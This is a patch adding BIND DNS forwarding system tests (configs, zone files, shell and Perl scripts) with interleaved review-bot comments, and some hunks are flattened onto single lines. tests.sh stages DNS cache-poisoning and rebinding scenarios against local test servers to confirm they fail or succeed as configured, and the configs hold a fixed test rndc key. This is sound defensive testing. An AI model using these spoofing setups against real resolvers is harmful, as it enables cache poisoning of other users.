+ pid-file "named.pid";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ edns-udp-size 1232;
+ forward only;
+ forwarders { 10.53.0.10; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+server 10.53.0.10 {
+ edns no;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
+
+zone "local.net." {
+ type primary;
+ file "local.net.db";
+ forwarders {};
+};
diff --git a/bin/tests/system/forward/ns9/named4.conf.in b/bin/tests/system/forward/ns9/named4.conf.in
new file mode 100644
index 0000000..5cd7d84
--- /dev/null
+++ b/bin/tests/system/forward/ns9/named4.conf.in
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ edns-udp-size 1232;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+server 10.53.0.10 {
+ edns no;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
+
+zone "local.tld." {
+ type primary;
+ file "local.tld.db";
+};
diff --git a/bin/tests/system/forward/ns9/root.db b/bin/tests/system/forward/ns9/root.db
new file mode 100644
index 0000000..2cbdff5
--- /dev/null
+++ b/bin/tests/system/forward/ns9/root.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
diff --git a/bin/tests/system/forward/prereq.sh b/bin/tests/system/forward/prereq.sh
new file mode 100644
index 0000000..2f5a187
--- /dev/null
+++ b/bin/tests/system/forward/prereq.sh
@@ -0,0 +1,37 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
+
+if test -n "$PYTHON"
+then
+ if $PYTHON -c "import dns" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the dnspython module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/forward/rfc1918-inherited.conf b/bin/tests/system/forward/rfc1918-inherited.conf
new file mode 100644
index 0000000..66569dc
--- /dev/null
+++ b/bin/tests/system/forward/rfc1918-inherited.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone 10.in-addr.arpa {
+ type forward;
+ forwarders { 1.2.3.4; };
+};
diff --git a/bin/tests/system/forward/rfc1918-notinherited.conf b/bin/tests/system/forward/rfc1918-notinherited.conf
new file mode 100644
index 0000000..d6d5c2d
--- /dev/null
+++ b/bin/tests/system/forward/rfc1918-notinherited.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone 10.in-addr.arpa {
+ type forward;
+ forward first;
+ forwarders { 1.2.3.4; };
+};
diff --git a/bin/tests/system/forward/setup.sh b/bin/tests/system/forward/setup.sh
new file mode 100644
index 0000000..589f983
--- /dev/null
+++ b/bin/tests/system/forward/setup.sh
@@ -0,0 +1,30 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+. "$SYSTEMTESTTOP/conf.sh"
+
+$SHELL clean.sh
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
+copy_setports ns9/named1.conf.in ns9/named.conf
+copy_setports ns10/named.conf.in ns10/named.conf
+
+(
+ cd ns1
+ $SHELL sign.sh
+)
diff --git a/bin/tests/system/forward/tests.sh b/bin/tests/system/forward/tests.sh
new file mode 100644
index 0000000..4b3a1ab
--- /dev/null
+++ b/bin/tests/system/forward/tests.sh
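Review bot: In the final subshell of forward/setup.sh, `cd ns1` and `$SHELL sign.sh` are independent commands, so a failed `cd` still attempts `sign.sh` from the current directory; `cd ns1 && $SHELL sign.sh` stops at the failure. The script also sources `"$SYSTEMTESTTOP/conf.sh"` without assigning `SYSTEMTESTTOP`, whereas prereq.sh and tests.sh in the same directory set `SYSTEMTESTTOP=..` first. If the variable is unset the path becomes `/conf.sh`, so a leading `SYSTEMTESTTOP=..` would match the sibling scripts unless the runner is known to export it.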
@@ -0,0 +1,383 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +#shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() ( + "$DIG" -p "$PORT" "$@" +) + +sendcmd() ( + "$PERL" ../send.pl 10.53.0.6 "$EXTRAPORT1" +) + +rndccmd() { + "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@" +} + +root=10.53.0.1 +hidden=10.53.0.2 +f1=10.53.0.3 +f2=10.53.0.4 + +status=0 +n=0 + +n=$((n+1)) +echo_i "checking that a forward zone overrides global forwarders ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example1. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example1. txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward first zone no forwarders recurses ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example2. txt @$root > dig.out.$n.root || ret=1 +dig_with_opts +noadd +noauth txt.example2. txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.root dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward only zone no forwarders fails ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example2. txt @$root > dig.out.$n.root || ret=1 +dig_with_opts +noadd +noauth txt.example2. 
txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.root dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that global forwarders work ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example4. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example4. txt @$f1 > dig.out.$n.f1 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward zone works ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example1. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example1. txt @$f2 > dig.out.$n.f2 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that forwarding doesn't spontaneously happen ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example2. txt @$root > dig.out.$n.root || ret=1 +dig_with_opts +noadd +noauth txt.example2. txt @$f2 > dig.out.$n.f2 || ret=1 +digcomp dig.out.$n.root dig.out.$n.f2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward zone with no specified policy works ($n)" +ret=0 +dig_with_opts +noadd +noauth txt.example3. txt @$hidden > dig.out.$n.hidden || ret=1 +dig_with_opts +noadd +noauth txt.example3. txt @$f2 > dig.out.$n.f2 || ret=1 +digcomp dig.out.$n.hidden dig.out.$n.f2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that a forward only doesn't recurse ($n)" +ret=0 +dig_with_opts txt.example5. 
txt @$f2 > dig.out.$n.f2 || ret=1 +grep "SERVFAIL" dig.out.$n.f2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking for negative caching of forwarder response ($n)" +# prime the cache, shutdown the forwarder then check that we can +# get the answer from the cache. restart forwarder. +ret=0 +dig_with_opts nonexist. txt @10.53.0.5 > dig.out.$n.f2 || ret=1 +grep "status: NXDOMAIN" dig.out.$n.f2 > /dev/null || ret=1 +stop_server ns4 || ret=1 +dig_with_opts nonexist. txt @10.53.0.5 > dig.out.$n.f2 || ret=1 +grep "status: NXDOMAIN" dig.out.$n.f2 > /dev/null || ret=1 +start_server --restart --noclean --port "${PORT}" ns4 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +check_override() ( + dig_with_opts 1.0.10.in-addr.arpa TXT @10.53.0.4 > dig.out.$n.f2 && + grep "status: NOERROR" dig.out.$n.f2 > /dev/null && + dig_with_opts 2.0.10.in-addr.arpa TXT @10.53.0.4 > dig.out.$n.f2 && + grep "status: NXDOMAIN" dig.out.$n.f2 > /dev/null +) + +n=$((n+1)) +echo_i "checking that forward only zone overrides empty zone ($n)" +ret=0 +# retry loop in case the server restart above causes transient failure +retry_quiet 10 check_override || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that DS lookups for grafting forward zones are isolated ($n)" +ret=0 +dig_with_opts grafted A @10.53.0.4 > dig.out.$n.q1 || ret=1 +dig_with_opts grafted DS @10.53.0.4 > dig.out.$n.q2 || ret=1 +dig_with_opts grafted A @10.53.0.4 > dig.out.$n.q3 || ret=1 +dig_with_opts grafted AAAA @10.53.0.4 > dig.out.$n.q4 || ret=1 +grep "status: NOERROR" dig.out.$n.q1 > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.$n.q2 > /dev/null || ret=1 +grep "status: NOERROR" dig.out.$n.q3 > /dev/null || ret=1 +grep "status: NOERROR" dig.out.$n.q4 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that 
rfc1918 inherited 'forward first;' zones are warned about ($n)" +ret=0 +$CHECKCONF rfc1918-inherited.conf | grep "forward first;" >/dev/null || ret=1 +$CHECKCONF rfc1918-notinherited.conf | grep "forward first;" >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that ULA inherited 'forward first;' zones are warned about ($n)" +ret=0 +$CHECKCONF ula-inherited.conf | grep "forward first;" >/dev/null || ret=1 +$CHECKCONF ula-notinherited.conf | grep "forward first;" >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +count_sent() ( + logfile="$1" + start_pattern="$2" + pattern="$3" + nextpartpeek "$logfile" | tr -d '\r' | sed -n "/$start_pattern/,/^\$/p" | grep -c "$pattern" +) + +check_sent() ( + expected="$1" + shift + count=$(count_sent "$@") + [ "$expected" = "$count" ] +) + +wait_for_log() ( + nextpartpeek "$1" | grep "$2" >/dev/null + +) + +n=$((n+1)) +echo_i "checking that a forwarder timeout prevents it from being reused in the same fetch context ($n)" +ret=0 +# Make ans6 receive queries without responding to them. +echo "//" | sendcmd +# Query for a record in a zone which is forwarded to a non-responding forwarder +# and is delegated from the root to check whether the forwarder will be retried +# when a delegation is encountered after falling back to full recursive +# resolution. +nextpart ns3/named.run >/dev/null +dig_with_opts txt.example7. txt @$f1 > dig.out.$n.f1 || ret=1 +# The forwarder for the "example7" zone should only be queried once. 
+start_pattern="sending packet to 10\.53\.0\.6" +retry_quiet 5 wait_for_log ns3/named.run "$start_pattern" +check_sent 1 ns3/named.run "$start_pattern" ";txt\.example7\.[[:space:]]*IN[[:space:]]*TXT$" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that priming queries are not forwarded ($n)" +ret=0 +nextpart ns7/named.run >/dev/null +dig_with_opts +noadd +noauth txt.example1. txt @10.53.0.7 > dig.out.$n.f7 || ret=1 +received_pattern="received packet from 10\.53\.0\.1" +start_pattern="sending packet to 10\.53\.0\.1" +retry_quiet 5 wait_for_log ns7/named.run "$received_pattern" || ret=1 +check_sent 1 ns7/named.run "$start_pattern" ";\.[[:space:]]*IN[[:space:]]*NS$" || ret=1 +sent=$(grep -c "10.53.0.7#.* (.): query '\./NS/IN' approved" ns4/named.run) +[ "$sent" -eq 0 ] || ret=1 +sent=$(grep -c "10.53.0.7#.* (.): query '\./NS/IN' approved" ns1/named.run) +[ "$sent" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking recovery from forwarding to a non-recursive server ($n)" +ret=0 +dig_with_opts xxx.sld.tld txt @10.53.0.8 > dig.out.$n.f8 || ret=1 +grep "status: NOERROR" dig.out.$n.f8 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that rebinding protection works in forward only mode ($n)" +ret=0 +# 10.53.0.5 will forward target.malicious. query to 10.53.0.4 +# which in turn will return a CNAME for subdomain.rebind. +# to honor the option deny-answer-aliases { "rebind"; }; +# ns5 should return a SERVFAIL to avoid potential rebinding attacks +dig_with_opts +noadd +noauth @10.53.0.5 target.malicious. 
> dig.out.$n || ret=1 +grep "status: SERVFAIL" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking switch from forwarding to normal resolution while chasing DS ($n)" +ret=0 +copy_setports ns3/named2.conf.in ns3/named.conf +rndccmd 10.53.0.3 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 +sendcmd << EOF +/ns1.sld.tld/A/ +300 A 10.53.0.2 +/sld.tld/NS/ +300 NS ns1.sld.tld. +/sld.tld/ +EOF +nextpart ns3/named.run >/dev/null +dig_with_opts @$f1 xxx.yyy.sld.tld ds > dig.out.$n.f1 || ret=1 +grep "status: SERVFAIL" dig.out.$n.f1 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Check various spoofed response scenarios. The same tests will be +# run twice, with "forward first" and "forward only" configurations. +# +run_spooftests () { + n=$((n+1)) + echo_i "checking spoofed response scenario 1 - out of bailiwick NS ($n)" + ret=0 + # prime + dig_with_opts @10.53.0.9 attackSecureDomain.net > dig.out.$n.prime || ret=1 + # check 'net' is not poisoned. + dig_with_opts @10.53.0.9 diditwork.net. TXT > dig.out.$n.net || ret=1 + grep '^diditwork\.net\..*TXT.*"recursed"' dig.out.$n.net > /dev/null || ret=1 + # check 'sub.local.net' is not poisoned. + dig_with_opts @10.53.0.9 sub.local.net TXT > dig.out.$n.sub || ret=1 + grep '^sub\.local\.net\..*TXT.*"recursed"' dig.out.$n.sub > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking spoofed response scenario 2 - inject DNAME/net2. ($n)" + ret=0 + # prime + dig_with_opts @10.53.0.9 attackSecureDomain.net2 > dig.out.$n.prime || ret=1 + # check that net2/DNAME is not cached + dig_with_opts @10.53.0.9 net2. 
DNAME > dig.out.$n.net2 || ret=1 + grep "ANSWER: 0," dig.out.$n.net2 > /dev/null || ret=1 + grep "status: NXDOMAIN" dig.out.$n.net2 > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking spoofed response scenario 3 - extra answer ($n)" + ret=0 + # prime + dig_with_opts @10.53.0.9 attackSecureDomain.net3 > dig.out.$n.prime || ret=1 + # check extra net3 records are not cached + rndccmd 10.53.0.9 dumpdb -cache 2>&1 | sed 's/^/ns9 /' | cat_i + for try in 1 2 3 4 5; do + lines=$(grep "net3" ns9/named_dump.db | wc -l) + if [ ${lines} -eq 0 ]; then + sleep 1 + continue + fi + [ ${lines} -eq 1 ] || ret=1 + grep -q '^attackSecureDomain.net3' ns9/named_dump.db || ret=1 + grep -q '^local.net3' ns9/named_dump.db && ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +} + +echo_i "checking spoofed response scenarios with forward first zones" +run_spooftests + +copy_setports ns9/named2.conf.in ns9/named.conf +rndccmd 10.53.0.9 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +rndccmd 10.53.0.9 flush 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 + +echo_i "rechecking spoofed response scenarios with forward only zones" +run_spooftests + +# +# This scenario expects the spoofed response to succeed. The tests are +# similar to the ones above, but not identical. +# +echo_i "rechecking spoofed response scenarios with 'forward only' set globally" +copy_setports ns9/named3.conf.in ns9/named.conf +rndccmd 10.53.0.9 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +rndccmd 10.53.0.9 flush 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 + +n=$((n+1)) +echo_i "checking spoofed response scenario 1 - out of bailiwick NS ($n)" +ret=0 +# prime +dig_with_opts @10.53.0.9 attackSecureDomain.net > dig.out.$n.prime || ret=1 +# check 'net' is poisoned. +dig_with_opts @10.53.0.9 diditwork.net. 
TXT > dig.out.$n.net || ret=1 +grep '^didItWork\.net\..*TXT.*"if you can see this record the attack worked"' dig.out.$n.net > /dev/null || ret=1 +# check 'sub.local.net' is poisoned. +dig_with_opts @10.53.0.9 sub.local.net TXT > dig.out.$n.sub || ret=1 +grep '^sub\.local\.net\..*TXT.*"if you see this attacker overrode local delegation"' dig.out.$n.sub > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking spoofed response scenario 2 - inject DNAME/net2. ($n)" +ret=0 +# prime +dig_with_opts @10.53.0.9 attackSecureDomain.net2 > dig.out.$n.prime || ret=1 +# check that net2/DNAME is cached +dig_with_opts @10.53.0.9 net2. DNAME > dig.out.$n.net2 || ret=1 +grep "ANSWER: 1," dig.out.$n.net2 > /dev/null || ret=1 +grep "net2\..*IN.DNAME.net\.example\.lll\." dig.out.$n.net2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# This test doesn't use any forwarder clauses but is here because it +# is similar to forwarders, as the set of servers that can populate +# the namespace is defined by the zone content. +# +echo_i "rechecking spoofed response scenarios glue below local zone" +copy_setports ns9/named4.conf.in ns9/named.conf +rndccmd 10.53.0.9 reconfig 2>&1 | sed 's/^/ns3 /' | cat_i +rndccmd 10.53.0.9 flush 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 1 + +n=$((n+1)) +echo_i "checking sibling glue below zone ($n)" +ret=0 +# prime +dig_with_opts @10.53.0.9 sibling.tld > dig.out.$n.prime || ret=1 +# check for glue A record for sub.local.tld is not used +dig_with_opts @10.53.0.9 sub.local.tld TXT > dig.out.$n.sub || ret=1 +grep "ANSWER: 1," dig.out.$n.sub > /dev/null || ret=1 +grep 'sub\.local\.tld\..*IN.TXT."good"$' dig.out.$n.sub > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
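Review bot: In `run_spooftests` scenario 3 of forward/tests.sh, the `for try in 1 2 3 4 5` loop leaves `ret` at 0 when `ns9/named_dump.db` never shows a `net3` line, so a failed or slow `rndc dumpdb` lets the cache-poisoning check pass without inspecting anything. The loop also has no `break`, so the greps are repeated on every remaining iteration once the dump is ready. I would record whether the dump was ever examined and fail when it was not, as below; this assumes the primed `attackSecureDomain.net3` name is always expected in the dump, which the existing `|| ret=1` grep implies. Separately, the `sed 's/^/ns3 /'` prefixes on the ns9 `reconfig` and `flush` calls label ns9 output as ns3.

```shell
  # … unchanged: prime query and rndccmd 10.53.0.9 dumpdb -cache …
  found=0
  for try in 1 2 3 4 5; do
    lines=$(grep -c "net3" ns9/named_dump.db 2>/dev/null)
    if [ "${lines:-0}" -eq 0 ]; then
      sleep 1
      continue
    fi
    found=1
    [ "$lines" -eq 1 ] || ret=1
    grep -q '^attackSecureDomain.net3' ns9/named_dump.db || ret=1
    grep -q '^local.net3' ns9/named_dump.db && ret=1
    break
  done
  # a dump that never contained a net3 line means nothing was verified
  [ "$found" -eq 1 ] || ret=1
  # … unchanged: failure report and status update …
```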
diff --git a/bin/tests/system/forward/ula-inherited.conf b/bin/tests/system/forward/ula-inherited.conf
new file mode 100644
index 0000000..1fb94b1
--- /dev/null
+++ b/bin/tests/system/forward/ula-inherited.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone d.f.ip6.arpa {
+ type forward;
+ forwarders { 1.2.3.4; };
+};
diff --git a/bin/tests/system/forward/ula-notinherited.conf b/bin/tests/system/forward/ula-notinherited.conf
new file mode 100644
index 0000000..300001a
--- /dev/null
+++ b/bin/tests/system/forward/ula-notinherited.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone d.f.ip6.arpa {
+ type forward;
+ forward first;
+ forwarders { 1.2.3.4; };
+};
diff --git a/bin/tests/system/fromhex.pl b/bin/tests/system/fromhex.pl
new file mode 100644
index 0000000..2a229e0
--- /dev/null
+++ b/bin/tests/system/fromhex.pl
@@ -0,0 +1,47 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# Converts hex ascii into raw data.
+# (This can be used, for example, to construct input for "wire_data -d".)
+
+require 5.006.001;
+
+use strict;
+use IO::File;
+
+sub usage {
+ print ("Usage: packet.pl [file]\n");
+ exit 1;
+}
+
+my $file = "STDIN";
+if (@ARGV >= 1) {
+ my $filename = shift @ARGV;
+ open FH, "<$filename" or die "$filename: $!";
+ $file = "FH";
+}
+
+my $input = "";
+while (defined(my $line = <$file>) ) {
+ chomp $line;
+ $line =~ s/#.*$//;
+ $input .= $line;
+}
+
+$input =~ s/\s+//g;
+my $data = pack("H*", $input);
+my $len = length $data;
+
+binmode(STDOUT);
+print($data);
+exit(0);
diff --git a/bin/tests/system/genzone.sh b/bin/tests/system/genzone.sh
new file mode 100644
index 0000000..02e3b96
--- /dev/null
+++ b/bin/tests/system/genzone.sh
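Review bot: In fromhex.pl, `open FH, "<$filename"` is the two-argument form, which takes the mode and the file name from one string, and it opens a package-global bareword handle that is then referred to by the string `"FH"`. The three-argument form with a lexical handle keeps the file name literal: start from `my $file = \*STDIN;`, then `open(my $fh, '<', $filename) or die "$filename: $!";` followed by `$file = $fh;`. Apart from that, `usage()` is never called and prints `packet.pl` rather than this script's name, and `$len` is computed but never used.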
@@ -0,0 +1,511 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up a test zone +# +# Usage: genzone.sh master-server-number secondary-server-number... +# +# e.g., "genzone.sh 2 3 4" means ns2 is the master and ns3, ns4 +# are secondaries. +# + +master="$1" + +cat <<EOF +\$TTL 3600 + +@ 86400 IN SOA ns${master} hostmaster ( + 1397051952 ; "SER0" + 5 + 5 + 1814400 + 3600 ) +EOF + +for n +do + cat <<EOF +@ NS ns${n} +ns${n} A 10.53.0.${n} +EOF +done + +cat <<\EOF + +; type 1 +a01 A 0.0.0.0 +a02 A 255.255.255.255 + +; type 2 +; see NS records at top of file + +; type 3 +; md01 MD madname +; MD . + +; type 4 +; mf01 MF madname +; mf01 MF . + +; type 5 +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . + +; type 6 +; see SOA record at top of file + +; type 7 +mb01 MG madname +mb02 MG . + +; type 8 +mg01 MG mgmname +mg02 MG . + +; type 9 +mr01 MR mrname +mr02 MR . + +; type 10 +; NULL RRs are not allowed in master files per RFC1035. +;null01 NULL + +; type 11 +wks01 WKS 10.0.0.1 tcp telnet ftp 0 1 2 +wks02 WKS 10.0.0.1 udp domain 0 1 2 +wks03 WKS 10.0.0.2 tcp 65535 + +; type 12 +ptr01 PTR @ + +; type 13 +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO PC NetBSD + +; type 14 +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . + +; type 15 +mx01 MX 10 mail +mx02 MX 10 . 
+ +; type 16 +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT foo +txt04 TXT foo bar +txt05 TXT "foo bar" +txt06 TXT "foo\032bar" +txt07 TXT foo\032bar +txt08 TXT "foo\010bar" +txt09 TXT foo\010bar +txt10 TXT foo\ bar +txt11 TXT "\"foo\"" +txt12 TXT \"foo\" +txt13 TXT "foo;" +txt14 TXT "foo\;" +txt15 TXT "bar\\;" + +; type 17 +rp01 RP mbox-dname txt-dname +rp02 RP . . + +; type 18 +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . + +; type 19 +x2501 X25 123456789 +;x2502 X25 "123456789" + +; type 20 +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN isdn-address +isdn04 ISDN isdn-address subaddress + +; type 21 +rt01 RT 0 intermediate-host +rt02 RT 65535 . + +; type 22 +nsap01 NSAP ( + 0x47.0005.80.005a00.0000.0001.e133.ffffff000161.00 ) +nsap02 NSAP ( + 0x47.0005.80.005a00.0000.0001.e133.ffffff000161.00. ) +;nsap03 NSAP 0x + +; type 23 +nsap-ptr01 NSAP-PTR foo. +nsap-ptr01 